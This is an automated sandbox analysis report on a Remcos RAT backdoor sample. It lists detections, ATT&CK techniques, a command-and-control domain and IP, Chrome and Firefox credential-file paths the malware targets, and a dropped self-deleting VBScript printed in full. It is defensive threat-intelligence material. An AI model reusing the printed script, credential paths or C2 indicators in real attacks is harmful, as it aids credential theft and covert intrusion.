                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00450E7A
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_00404915 GetLocalTime,CreateEventA,CreateThread,0_2_00404915
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0041A7B2 GetComputerNameExW,GetUserNameW,0_2_0041A7B2
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: 0_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0044801F
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3307627880.000000000224F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Contains functionality to steal Chrome passwords or cookies
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_0040B21B
                        Contains functionality to steal Firefox passwords or cookies
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_0040B335
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: \key3.db0_2_0040B335

                        Remote Access Functionality

                        barindex
                        Detected Remcos RAT
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-IUHLZ9Jump to behavior
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3307627880.000000000224F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe PID: 7784, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeCode function: cmd.exe0_2_00405042

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information11
                        Scripting                        		Valid Accounts1
                        Native API                        		11
                        Scripting                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		12
                        Ingress Tool Transfer                        		Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts12
                        Command and Scripting Interpreter                        		1
                        DLL Side-Loading                        		1
                        Bypass User Account Control                        		2
                        Obfuscated Files or Information                        		211
                        Input Capture                        		1
                        Account Discovery                        		Remote Desktop Protocol211
                        Input Capture                        		2
                        Encrypted Channel                        		Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts2
                        Service Execution                        		1
                        Windows Service                        		1
                        Access Token Manipulation                        		1
                        DLL Side-Loading                        		2
                        Credentials In Files                        		1
                        System Service Discovery                        		SMB/Windows Admin Shares3
                        Clipboard Data                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                        Windows Service                        		1
                        Bypass User Account Control                        		NTDS3
                        File and Directory Discovery                        		Distributed Component Object ModelInput Capture1
                        Remote Access Software                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script22
                        Process Injection                        		1
                        File Deletion                        		LSA Secrets23
                        System Information Discovery                        		SSHKeylogging2
                        Non-Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading                        		Cached Domain Credentials21
                        Security Software Discovery                        		VNCGUI Input Capture12
                        Application Layer Protocol                        		Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Virtualization/Sandbox Evasion                        		DCSync1
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Access Token Manipulation                        		Proc Filesystem2
                        Process Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt22
                        Process Injection                        		/etc/passwd and /etc/shadow1
                        Application Window Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                        System Owner/User Discovery                        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe71%ReversingLabsWin32.Backdoor.Remcos
                        17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe100%AviraBDS/Backdoor.Gen
                        17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe100%Joe Sandbox ML

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        luiscaseres.gleeze.com100%Avira URL Cloudmalware

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        luiscaseres.gleeze.com
                        		179.15.136.6
                        		truetrue
                          		unknown
                          geoplugin.net
                          		178.237.33.50
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://geoplugin.net/json.gpfalse
                              		high
                              luiscaseres.gleeze.comtrue
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://geoplugin.net/json.gp/C17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exefalse
                                		high
                                http://geoplugin.net/json.gpj17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe, 00000000.00000003.1439769531.0000000000801000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  179.15.136.6
                                  		luiscaseres.gleeze.comColombia
                                  		27831ColombiaMovilCOtrue
                                  178.237.33.50
                                  		geoplugin.netNetherlands
                                  		8455ATOM86-ASATOM86NLfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1586001
                                  Start date and time:2025-01-08 15:59:36 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 17s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
                                  Detection:MAL
                                  Classification:mal100.rans.troj.spyw.expl.evad.winEXE@3/3@2/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 42
                                  • Number of non-executed functions: 199
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240s for sample files taking high CPU consumption
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  10:01:03API Interceptor4778409x Sleep call for process: 17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  179.15.136.61736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                    17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      178.237.33.501736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • geoplugin.net/json.gp
                                      17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • geoplugin.net/json.gp
                                      DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • geoplugin.net/json.gp
                                      c2.htaGet hashmaliciousRemcosBrowse
                                      • geoplugin.net/json.gp
                                      c2.htaGet hashmaliciousRemcosBrowse
                                      • geoplugin.net/json.gp
                                      RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                      • geoplugin.net/json.gp
                                      c2.htaGet hashmaliciousRemcosBrowse
                                      • geoplugin.net/json.gp
                                      17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • geoplugin.net/json.gp
                                      Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                      • geoplugin.net/json.gp
                                      c2.htaGet hashmaliciousRemcosBrowse
                                      • geoplugin.net/json.gp

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      geoplugin.net17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 178.237.33.50
                                      c2.htaGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      c2.htaGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      c2.htaGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      c2.htaGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      4XYAW8PbZH.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ATOM86-ASATOM86NL1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 178.237.33.50
                                      c2.htaGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      c2.htaGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      c2.htaGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                      • 178.237.33.50
                                      ColombiaMovilCO1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • 179.15.136.6
                                      17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • 179.15.136.6
                                      sh4.elfGet hashmaliciousMiraiBrowse
                                      • 177.252.126.19
                                      armv5l.elfGet hashmaliciousUnknownBrowse
                                      • 191.93.155.250
                                      Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                      • 179.12.199.43
                                      armv5l.elfGet hashmaliciousUnknownBrowse
                                      • 191.91.160.57
                                      kwari.arm.elfGet hashmaliciousUnknownBrowse
                                      • 181.204.131.174
                                      2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                      • 181.71.216.203
                                      telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                      • 177.252.126.11
                                      loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                      • 186.181.45.206

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\ProgramData\remcos\logs.dat

                                      Download File
                                      Process:C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):144
                                      Entropy (8bit):3.341257056764204
                                      Encrypted:false
                                      SSDEEP:3:rgls1MNtlVlFWl5JWRal2Jl+7R0DAlBG45klovDl6v:MlsaNF65YcIeeDAlOWAv
                                      MD5:8982C1053C33491C738F98E12B8E8EA9
                                      SHA1:4B6134E2BD46C5369E9BCE5344BC3A7B02E098A5
                                      SHA-256:6FF3BC51D3896AB08C038E4B893FD5B5D68DECED843F8709B91F726F9B1F3630
                                      SHA-512:127C5B43C0B68ACFF40AA32CAE7D3FD90AAEEF0A359D6A42B4BA51E96076CADB73BCB7BD449C1FCF13C6F5A3A89FDE10179F9BF57A0C7667FD331B303F714276
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                      Reputation:low
                                      Preview:....[.2.0.2.5./.0.1./.0.8. .1.0.:.0.0.:.3.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\json[1].json

                                      Download File
                                      Process:C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):963
                                      Entropy (8bit):5.019205124979377
                                      Encrypted:false
                                      SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
                                      MD5:B62617530A8532F9AECAA939B6AB93BB
                                      SHA1:E4DE9E9838052597EB2A5B363654C737BA1E6A66
                                      SHA-256:508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
                                      SHA-512:A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
                                      Malicious:false
                                      Reputation:low
                                      Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                      C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs

                                      Download File
                                      Process:C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):788
                                      Entropy (8bit):3.613846532314634
                                      Encrypted:false
                                      SSDEEP:12:xQ4lA2++ugypjBQMPURRRNl8gdPX9xKlNfSOG4Q3DwRNl8gdPX9xKlNfSOG49Hzk:7a2+SDG+vOltQTP+vOlt9Aait
                                      MD5:A702D08025293B9446AB9EC0C66709D3
                                      SHA1:1FD7AEABE22C07A61864F1DB96A1ED7F09B75676
                                      SHA-256:EEF3857FC97BBB7025AE34CBE0EC597FA551BB29403DB16A51D25486D270D94D
                                      SHA-512:18E5DF33717A183DB36451A62A7C299A47FE42F7024DAFA5FB99DE67CCBF10CEB3B5E5138DE82937AF515684B0CBEEE0155688B687C2FE0303E0A02A42E70270
                                      Malicious:true
                                      Reputation:low
                                      Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.D.e.s.k.t.o.p.\.1.7.3.6.3.4.8.2.2.4.7.f.6.0.1.3.3.f.0.1.3.d.6.2.a.a.e.3.8.c.5.3.1.a.c.9.5.b.b.5.5.a.2.0.0.a.2.4.3.b.0.e.1.5.f.a.7.c.f.8.e.8.9.2.3.b.2.a.1.0.5.9.0.f.9.5.2...d.a.t.-.d.e.c.o.d.e.d...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.D.e.s.k.t.o.p.\.1.7.3.6.3.4.8.2.2.4.7.f.6.0.1.3.3.f.0.1.3.d.6.2.a.a.e.3.8.c.5.3.1.a.c.9.5.b.b.5.5.a.2.0.0.a.2.4.3.b.0.e.1.5.f.a.7.c.f.8.e.8.9.2.3.b.2.a.1.0.5.9.0.f.9.5.2...d.a.t.-.d.e.c.o.d.e.d...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):6.586726337588914
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe
                                      File size:493'056 bytes
                                      MD5:fa48843ce9a50a4bc84f6996923b7a27
                                      SHA1:29df9451a5aae33ddca11c26163d1c276bf2ca65
                                      SHA256:311df69d6714a0736be9908da11fa4c544a542ba4f9c99a314e727b321a80cd7
                                      SHA512:d1f1d6b6268bf020319ca282483df3b8c05f28993f88faf04b0d26c4db5244a260c435784f93e2c6374879ef657465035b734e4cb71870c53934923a653d2722
                                      SSDEEP:12288:f9PgP3HAMwIGjY4vce6lnBthn5HSRVMf139F5woxr+IwtHwBtFhCsvZD5q+P32:943HfwIGYMcn5PJrZU+
                                      TLSH:21A4BE01B6D2C072D57625300D26E775DEBDBD212835897BB3DA1D67FE30180E63AAB2
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H....(..H....*..H....+..H...0]..H..&....H... ...H... ...H... ...H...0J..H...H...I...!...H...!&..H...!...H..Rich.H.

                                      File Icon

                                      Icon Hash:95694d05214c1b33

                                      Static PE Info

                                      General

                                      Entrypoint:0x433b4a
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6752B172 [Fri Dec 6 08:10:26 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:e77512f955eaf60ccff45e02d69234de

                                      Entrypoint Preview

                                      Instruction
                                      call 00007F7378B42B43h
                                      jmp 00007F7378B4249Fh
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 00000324h
                                      push ebx
                                      push 00000017h
                                      call 00007F7378B64979h
                                      test eax, eax
                                      je 00007F7378B42627h
                                      mov ecx, dword ptr [ebp+08h]
                                      int 29h
                                      push 00000003h
                                      call 00007F7378B427E4h
                                      mov dword ptr [esp], 000002CCh
                                      lea eax, dword ptr [ebp-00000324h]
                                      push 00000000h
                                      push eax
                                      call 00007F7378B44AFBh
                                      add esp, 0Ch
                                      mov dword ptr [ebp-00000274h], eax
                                      mov dword ptr [ebp-00000278h], ecx
                                      mov dword ptr [ebp-0000027Ch], edx
                                      mov dword ptr [ebp-00000280h], ebx
                                      mov dword ptr [ebp-00000284h], esi
                                      mov dword ptr [ebp-00000288h], edi
                                      mov word ptr [ebp-0000025Ch], ss
                                      mov word ptr [ebp-00000268h], cs
                                      mov word ptr [ebp-0000028Ch], ds
                                      mov word ptr [ebp-00000290h], es
                                      mov word ptr [ebp-00000294h], fs
                                      mov word ptr [ebp-00000298h], gs
                                      pushfd
                                      pop dword ptr [ebp-00000264h]
                                      mov eax, dword ptr [ebp+04h]
                                      mov dword ptr [ebp-0000026Ch], eax
                                      lea eax, dword ptr [ebp+04h]
                                      mov dword ptr [ebp-00000260h], eax
                                      mov dword ptr [ebp-00000324h], 00010001h
                                      mov eax, dword ptr [eax-04h]
                                      push 00000050h
                                      mov dword ptr [ebp-00000270h], eax
                                      lea eax, dword ptr [ebp-58h]
                                      push 00000000h
                                      push eax
                                      call 00007F7378B44A71h

                                      Rich Headers

                                      Programming Language:
                                      • [C++] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6e0200x104.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x4b40.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7b0000x3b88.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x6c5100x38.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x6c5e80x18.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6c5480x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x570000x4f4.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

